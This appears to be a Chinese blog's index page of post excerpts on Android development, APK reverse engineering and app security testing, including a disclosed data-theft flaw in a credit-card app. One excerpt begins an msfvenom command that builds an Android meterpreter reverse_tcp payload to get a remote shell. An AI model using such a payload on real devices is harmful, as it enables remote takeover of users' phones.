caiqiiqi

caiqiiqi的博客

安卓安装包(APK,DEX)的diff工具介绍

Android Application Diffing: Engine Overview 讲Quarkslab 背后的设计理念。 第二篇 通过一个漏洞CVE-2019-10875来展现工具的功能。 第三篇通过 https://blog.quarkslab.com/android-applicati...

2019-05-20 15:30:04

阅读数 50

评论数 0

夜神模拟器安装Burp Suite证书

https://blog.csdn.net/qq_36658099/article/details/81487491 https://blog.csdn.net/susu_xi/article/details/86247295

2019-04-10 17:13:03

阅读数 137

评论数 0

AndroBugs不能分析多dex情况的缓解trick

#先用apktool反编译,不反编译源码和资源文件节省时间 apktool d test.apk -o test--no-res --no-src cd test # 如果有三个dex文件,classes.dex,classes2.dex,classes3.dex,删除第一个和第三个,将第二个重命...

2019-04-04 14:46:43

阅读数 18

评论数 0

AndroBugs

https://github.com/caiqiqi/AndroBugs

2019-03-08 11:12:52

阅读数 82

评论数 0

msfvenom生成apk payload然后得到meterpreter shell

先生成一个payload,带上meterpreter监听的地址和端口: msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> ...

2018-11-15 13:20:40

阅读数 644

评论数 1

51 信用卡管家 Android 客户端内部数据库文件可被盗取

原文: 真的安全吗之51信用卡管家Android客户端审计报告 1.讲这个漏洞先要介绍一下一个安卓系统特性:db-journal 文件是 sqlite 的一个临时的日志文件,主 要用于 sqlite 事务回滚机制,在事务开始时产生,在事务结束时删除;当程序发生崩溃或者系统断 电时该文件将留在磁...

2018-11-14 16:17:05

阅读数 144

评论数 0

使用 apktool 工具对 Android APK 进行反编译与回编译

原文:https://testerhome.com/topics/12075?locale=zh-TW

2018-10-31 16:54:54

阅读数 287

评论数 0

Android小代码

查看某app的签名版本 adb shell pm dump com.example|grep apkSigningVersion 命令行查看系统版本号 adb shell getprop ro.build.version.release 根据界面元素id定位代码 ...

2017-10-18 01:12:50

阅读数 303

评论数 0

继续逆向youdaodict

两年前逆向了youdaodict,注释掉了关键Activity的smali中的三行代码使得三个Tab不能加载,于是只使用其『词典』功能。 修改前(official)[~/GitProjects/android_re/repos/youdaodict]$ md5 youdaodict_offici...

2017-07-13 03:42:21

阅读数 393

评论数 0

查看apk签名信息

参考: http://www.jianshu.com/p/f45cfd9fccaaDemo修改后的apk这是我很久以前忘了用什么工具对youdaodict逆向之后,注释掉两行smali之后重打包的apk。近几个月这个应用一启动不久就崩溃了,我还以为是签名时间到了,结果发现并没有到,应该是其他的什...

2017-07-13 01:29:44

阅读数 632

评论数 0

使用grep查看匹配行的前后n行信息

$ grep -rn "android.intent.action.MAIN" -B 3 -C 2 AndroidManifest.xml AndroidManifest.xml-43- <activity android:name="com.yo...

2017-07-13 01:16:17

阅读数 1526

评论数 0

Android数据库高手秘籍(一)——SQLite命令

http://blog.csdn.net/guolin_blog/article/details/38461239

2017-07-07 16:06:56

阅读数 112

评论数 0

IDA打开自动显示注释选项

对于不太熟悉汇编指令的同学,初次接触IDA的时候被IDA反编译出来的汇编指令吓到了,殊不知IDA其实是可以打开自动显示注释的选项的。通过Option->General->Auto Comments即可。显示注释前打开显示注释选项显示注释后

2017-06-29 13:25:55

阅读数 1618

评论数 0

weibo客户端访问网页链接解析缓存问题?

昨天碰到一个怪事,我转发了一条微博之后,当我在不同终端上访问同一个链接的时候, 居然打开的不是同一个链接。电脑网页版和一加2打开的链接是可以打开的(http://blog.sycsec.com/?p=1005)GET /?p=1005 HTTP/1.1 Host: blog.sycsec...

2017-04-23 14:35:55

阅读数 624

评论数 0

在Activity中创建Handler发送消息以及接受消息过程浅析

在Github上:https://github.com/caiqiqi/Notes/blob/master/%E5%9C%A8Activity%E4%B8%AD%E5%88%9B%E5%BB%BAHandler%E5%8F%91%E9%80%81%E6%B6%88%E6%81%AF%E4%BB%A...

2016-03-03 13:04:47

阅读数 433

评论数 0

Android开发者编码风格

原文链接 http://source.android.com/source/code-style.html译文(部分)开发者编码风格以上的编码风格都是很严格的规则,而不只是指导建议。一般来说,不按这些规矩来编码的话,Android是不接受这样的代码的。我们已经发现了现在的这些代码并不是完全按这些规...

2016-03-03 01:11:15

阅读数 268

评论数 0

Fragment更容易实现页面的切换

Fragments make implementing this functionality easy. The list of emails would exist in one fragment, and the detail view for an email would exist in ...

2016-03-02 13:06:04

阅读数 380

评论数 0

Android 开发规范与架构

摘要 使用Gradle和它推荐的工程目录 使用 Maven依赖而不是导入jar包 把密码和敏感数据放在gradle.properties 使用Fragment来呈现UI视图 使用Activity只是用来管理Fragment的 使用多个style文件以避免单一的大style文件 使用WebView时...

2016-03-02 01:51:20

阅读数 407

评论数 0

Android配置文件中<uses-sdk>标签

SYNTAX: <uses-sdk android:minSdkVersion="integer" android:targetSdkVersion="integer" android:ma...

2016-03-01 20:46:28

阅读数 404

评论数 0

Up navigation with fragments using AppCompat

public class MyActivity extends ActionBarActivity { @Override public boolean onSupportNavigateUp() { if(getSupportFragmentManager()....

2016-02-29 18:35:48

阅读数 335

评论数 0

提示
确定要删除当前文章?
取消 删除